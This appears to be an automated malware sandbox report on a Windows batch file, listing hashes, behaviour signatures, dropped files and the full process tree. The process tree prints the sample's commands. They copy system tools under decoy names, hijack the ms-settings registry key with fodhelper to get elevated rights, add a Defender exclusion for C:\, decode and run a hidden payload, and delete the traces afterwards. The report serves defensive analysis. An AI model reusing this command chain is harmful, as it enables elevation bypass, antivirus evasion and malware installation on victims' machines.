Analysis
-
max time kernel
141s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240215-en -
resource tags
arch:x64arch:x86image:win7-20240215-enlocale:en-usos:windows7-x64system -
submitted
07-06-2024 01:10
Static task
static1
Behavioral task
behavioral1
Sample
1242e10442597e1c7a5ba0eb08de59c358c4fa20c38a85b5870f892a8dad03df.bat
Resource
win7-20240215-en
Behavioral task
behavioral2
Sample
1242e10442597e1c7a5ba0eb08de59c358c4fa20c38a85b5870f892a8dad03df.bat
Resource
win10v2004-20240508-en
General
-
Target
1242e10442597e1c7a5ba0eb08de59c358c4fa20c38a85b5870f892a8dad03df.bat
-
Size
3.0MB
-
MD5
17c7045b36fae5916e2900899e40fcdc
-
SHA1
793de1034b8dbce1547b85d7348324e8fb5d0106
-
SHA256
1242e10442597e1c7a5ba0eb08de59c358c4fa20c38a85b5870f892a8dad03df
-
SHA512
f4be2aa7efaad65542147360369292774d242c0cc8ab6489036f601b9e914642a3183d0a2b0130d216e2b40baaebf368395cf755a5680999c2e83cfcdf899e46
-
SSDEEP
49152:MmZIVekHAYmaBfa2cLySXFDvh13zo//zhK6x3UGZJyFxCknVgGlL1+I0bHdFE4K3:x
Malware Config
Signatures
-
Executes dropped EXE 24 IoCs
Processes:
alpha.exealpha.exealpha.exealpha.exekn.exealpha.exealpha.exealpha.exealpha.exexkn.exealpha.exeger.exealpha.exekn.exealpha.exePing_c.pifalpha.exealpha.exealpha.exealpha.exealpha.exealpha.exealpha.exealpha.exepid process 1988 alpha.exe 2884 alpha.exe 2880 alpha.exe 2556 alpha.exe 2612 kn.exe 2476 alpha.exe 2072 alpha.exe 2596 alpha.exe 1652 alpha.exe 2400 xkn.exe 2472 alpha.exe 2860 ger.exe 2192 alpha.exe 2144 kn.exe 624 alpha.exe 1984 Ping_c.pif 2644 alpha.exe 1716 alpha.exe 1504 alpha.exe 1720 alpha.exe 2680 alpha.exe 1556 alpha.exe 1892 alpha.exe 1452 alpha.exe -
Loads dropped DLL 23 IoCs
Processes:
cmd.exealpha.exealpha.exexkn.exealpha.exealpha.exeWerFault.exepid process 1844 cmd.exe 1844 cmd.exe 1844 cmd.exe 1844 cmd.exe 2556 alpha.exe 1844 cmd.exe 1844 cmd.exe 1844 cmd.exe 1844 cmd.exe 1652 alpha.exe 2400 xkn.exe 2400 xkn.exe 2400 xkn.exe 2472 alpha.exe 1844 cmd.exe 2192 alpha.exe 1844 cmd.exe 1844 cmd.exe 1844 cmd.exe 1844 cmd.exe 1844 cmd.exe 1964 WerFault.exe 1964 WerFault.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 1964 1984 WerFault.exe Ping_c.pif -
Kills process with taskkill 1 IoCs
Processes:
taskkill.exepid process 880 taskkill.exe -
Modifies registry class 5 IoCs
Processes:
ger.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000_CLASSES\ms-settings\shell\open ger.exe Set value (str) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000_CLASSES\ms-settings\shell\open\command\ = "C:\\\\Users\\\\Public\\\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\"" ger.exe Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000_CLASSES\ms-settings\shell\open\command ger.exe Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000_CLASSES\ms-settings ger.exe Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000_CLASSES\ms-settings\shell ger.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
Ping_c.pifpid process 1984 Ping_c.pif -
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
xkn.exepid process 2400 xkn.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
xkn.exetaskkill.exedescription pid process Token: SeDebugPrivilege 2400 xkn.exe Token: SeDebugPrivilege 880 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cmd.exealpha.exealpha.exealpha.exealpha.exealpha.exealpha.exexkn.exealpha.exealpha.exealpha.exedescription pid process target process PID 1844 wrote to memory of 2936 1844 cmd.exe extrac32.exe PID 1844 wrote to memory of 2936 1844 cmd.exe extrac32.exe PID 1844 wrote to memory of 2936 1844 cmd.exe extrac32.exe PID 1844 wrote to memory of 1988 1844 cmd.exe alpha.exe PID 1844 wrote to memory of 1988 1844 cmd.exe alpha.exe PID 1844 wrote to memory of 1988 1844 cmd.exe alpha.exe PID 1844 wrote to memory of 2884 1844 cmd.exe alpha.exe PID 1844 wrote to memory of 2884 1844 cmd.exe alpha.exe PID 1844 wrote to memory of 2884 1844 cmd.exe alpha.exe PID 1844 wrote to memory of 2880 1844 cmd.exe alpha.exe PID 1844 wrote to memory of 2880 1844 cmd.exe alpha.exe PID 1844 wrote to memory of 2880 1844 cmd.exe alpha.exe PID 2880 wrote to memory of 2480 2880 alpha.exe extrac32.exe PID 2880 wrote to memory of 2480 2880 alpha.exe extrac32.exe PID 2880 wrote to memory of 2480 2880 alpha.exe extrac32.exe PID 1844 wrote to memory of 2556 1844 cmd.exe alpha.exe PID 1844 wrote to memory of 2556 1844 cmd.exe alpha.exe PID 1844 wrote to memory of 2556 1844 cmd.exe alpha.exe PID 2556 wrote to memory of 2612 2556 alpha.exe kn.exe PID 2556 wrote to memory of 2612 2556 alpha.exe kn.exe PID 2556 wrote to memory of 2612 2556 alpha.exe kn.exe PID 1844 wrote to memory of 2476 1844 cmd.exe alpha.exe PID 1844 wrote to memory of 2476 1844 cmd.exe alpha.exe PID 1844 wrote to memory of 2476 1844 cmd.exe alpha.exe PID 2476 wrote to memory of 2600 2476 alpha.exe extrac32.exe PID 2476 wrote to memory of 2600 2476 alpha.exe extrac32.exe PID 2476 wrote to memory of 2600 2476 alpha.exe extrac32.exe PID 1844 wrote to memory of 2072 1844 cmd.exe alpha.exe PID 1844 wrote to memory of 2072 1844 cmd.exe alpha.exe PID 1844 wrote to memory of 2072 1844 cmd.exe alpha.exe PID 2072 wrote to memory of 2468 2072 alpha.exe extrac32.exe PID 2072 wrote to memory of 2468 2072 alpha.exe extrac32.exe PID 2072 wrote to memory of 2468 2072 alpha.exe extrac32.exe PID 1844 wrote to memory of 2596 1844 cmd.exe alpha.exe PID 1844 wrote to memory of 2596 1844 cmd.exe alpha.exe PID 1844 wrote to memory of 2596 1844 cmd.exe alpha.exe PID 2596 wrote to memory of 2856 2596 alpha.exe extrac32.exe PID 2596 wrote to memory of 2856 2596 alpha.exe extrac32.exe PID 2596 wrote to memory of 2856 2596 alpha.exe extrac32.exe PID 1844 wrote to memory of 1652 1844 cmd.exe alpha.exe PID 1844 wrote to memory of 1652 1844 cmd.exe alpha.exe PID 1844 wrote to memory of 1652 1844 cmd.exe alpha.exe PID 1652 wrote to memory of 2400 1652 alpha.exe xkn.exe PID 1652 wrote to memory of 2400 1652 alpha.exe xkn.exe PID 1652 wrote to memory of 2400 1652 alpha.exe xkn.exe PID 2400 wrote to memory of 2472 2400 xkn.exe alpha.exe PID 2400 wrote to memory of 2472 2400 xkn.exe alpha.exe PID 2400 wrote to memory of 2472 2400 xkn.exe alpha.exe PID 2472 wrote to memory of 2860 2472 alpha.exe ger.exe PID 2472 wrote to memory of 2860 2472 alpha.exe ger.exe PID 2472 wrote to memory of 2860 2472 alpha.exe ger.exe PID 1844 wrote to memory of 2192 1844 cmd.exe alpha.exe PID 1844 wrote to memory of 2192 1844 cmd.exe alpha.exe PID 1844 wrote to memory of 2192 1844 cmd.exe alpha.exe PID 2192 wrote to memory of 2144 2192 alpha.exe kn.exe PID 2192 wrote to memory of 2144 2192 alpha.exe kn.exe PID 2192 wrote to memory of 2144 2192 alpha.exe kn.exe PID 1844 wrote to memory of 624 1844 cmd.exe alpha.exe PID 1844 wrote to memory of 624 1844 cmd.exe alpha.exe PID 1844 wrote to memory of 624 1844 cmd.exe alpha.exe PID 624 wrote to memory of 880 624 alpha.exe taskkill.exe PID 624 wrote to memory of 880 624 alpha.exe taskkill.exe PID 624 wrote to memory of 880 624 alpha.exe taskkill.exe PID 1844 wrote to memory of 1984 1844 cmd.exe Ping_c.pif
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\1242e10442597e1c7a5ba0eb08de59c358c4fa20c38a85b5870f892a8dad03df.bat"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\extrac32.exeC:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"2⤵
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows "2⤵
- Executes dropped EXE
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32"2⤵
- Executes dropped EXE
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\extrac32.exeextrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe3⤵
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\1242e10442597e1c7a5ba0eb08de59c358c4fa20c38a85b5870f892a8dad03df.bat" "C:\\Users\\Public\\Ping_c.mp4" 92⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\kn.exeC:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\1242e10442597e1c7a5ba0eb08de59c358c4fa20c38a85b5870f892a8dad03df.bat" "C:\\Users\\Public\\Ping_c.mp4" 93⤵
- Executes dropped EXE
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\extrac32.exeextrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"3⤵
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\extrac32.exeextrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"3⤵
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\extrac32.exeextrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"3⤵
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\xkn.exeC:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\alpha.exe"C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\ger.exeC:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""5⤵
- Executes dropped EXE
- Modifies registry class
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Ping_c.mp4" "C:\\Users\\Public\\Libraries\\Ping_c.pif" 122⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\kn.exeC:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Ping_c.mp4" "C:\\Users\\Public\\Libraries\\Ping_c.pif" 123⤵
- Executes dropped EXE
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill /F /IM SystemSettings.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Public\Libraries\Ping_c.pifC:\Users\Public\Libraries\Ping_c.pif2⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1984 -s 6803⤵
- Loads dropped DLL
- Program crash
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Windows \System32\*"2⤵
- Executes dropped EXE
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c rmdir "C:\Windows \System32"2⤵
- Executes dropped EXE
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c rmdir "C:\Windows \"2⤵
- Executes dropped EXE
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Users\Public\per.exe" / A / F / Q / S2⤵
- Executes dropped EXE
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Users\Public\ger.exe" / A / F / Q / S2⤵
- Executes dropped EXE
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S2⤵
- Executes dropped EXE
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Users\Public\Ping_c.mp4" / A / F / Q / S2⤵
- Executes dropped EXE
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Users\Public\xkn.exe" / A / F / Q / S2⤵
- Executes dropped EXE
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Public\Libraries\Ping_c.pifFilesize
1.1MB
MD5962c746f045885ca2883fec129a5bb98
SHA1bdad34f489b6a8b3a3101d658ea426805e859473
SHA2568b5cbf4eba7ce848616eda92a3eaea0372a7a97efba05ce2ebfac5c99c243e71
SHA51245cd944310a28216835eea924cd03c668b948ccab63a7b6489453a69bf6a7f160d105e9879096580d571e7af1ab4deea02ec506f57f48e370b8c5918c44cdb83
-
C:\Users\Public\Ping_c.mp4Filesize
2.2MB
MD518fbc4b3cab1f954789cf7649dcd1dff
SHA1661ba52bd44e913cd74b214e1652843f1f894e1c
SHA2564bb6bb0afbf65b0bdf0d5f0963c1133f3a0d049557d485d185e1e65b5b84987a
SHA512de11b7621e1170f0f6d0efa75d2b75456a5b3d677d865ab07ad157b1e7ad7eec175404500e92806e7c20085512b82ad2db2c0eb83377baacd24d0500b5e501c3
-
C:\Users\Public\alpha.exeFilesize
337KB
MD55746bd7e255dd6a8afa06f7c42c1ba41
SHA10f3c4ff28f354aede202d54e9d1c5529a3bf87d8
SHA256db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386
SHA5123a968356d7b94cc014f78ca37a3c03f354c3970c9e027ed4ccb8e59f0f9f2a32bfa22e7d6b127d44631d715ea41bf8ace91f0b4d69d1714d55552b064ffeb69e
-
C:\Users\Public\ger.exeFilesize
73KB
MD59d0b3066fe3d1fd345e86bc7bcced9e4
SHA1e05984a6671fcfecbc465e613d72d42bda35fd90
SHA2564e66b857b7010db8d4e4e28d73eb81a99bd6915350bb9a63cd86671051b22f0e
SHA512d773ca3490918e26a42f90f5c75a0728b040e414d03599ca70e99737a339858e9f0c99711bed8eeebd5e763d10d45e19c4e7520ee62d6957bc9799fd62d4e119
-
C:\Users\Public\kn.exeFilesize
1.1MB
MD5ec1fd3050dbc40ec7e87ab99c7ca0b03
SHA1ae7fdfc29f4ef31e38ebf381e61b503038b5cb35
SHA2561e19c5a26215b62de1babd5633853344420c1e673bb83e8a89213085e17e16e3
SHA5124e47331f2fdce77b01d86cf8e21cd7d6df13536f09b70c53e5a6b82f66512faa10e38645884c696b47a27ea6bddc6c1fdb905ee78684dca98cbda5f39fbafcc2
-
C:\Users\Public\xkn.exeFilesize
462KB
MD5852d67a27e454bd389fa7f02a8cbe23f
SHA15330fedad485e0e4c23b2abe1075a1f984fde9fc
SHA256a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8
SHA512327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d
-
memory/1984-78-0x0000000000400000-0x0000000000522000-memory.dmpFilesize
1.1MB
-
memory/2400-44-0x0000000001CD0000-0x0000000001CD8000-memory.dmpFilesize
32KB
-
memory/2400-43-0x000000001B420000-0x000000001B702000-memory.dmpFilesize
2.9MB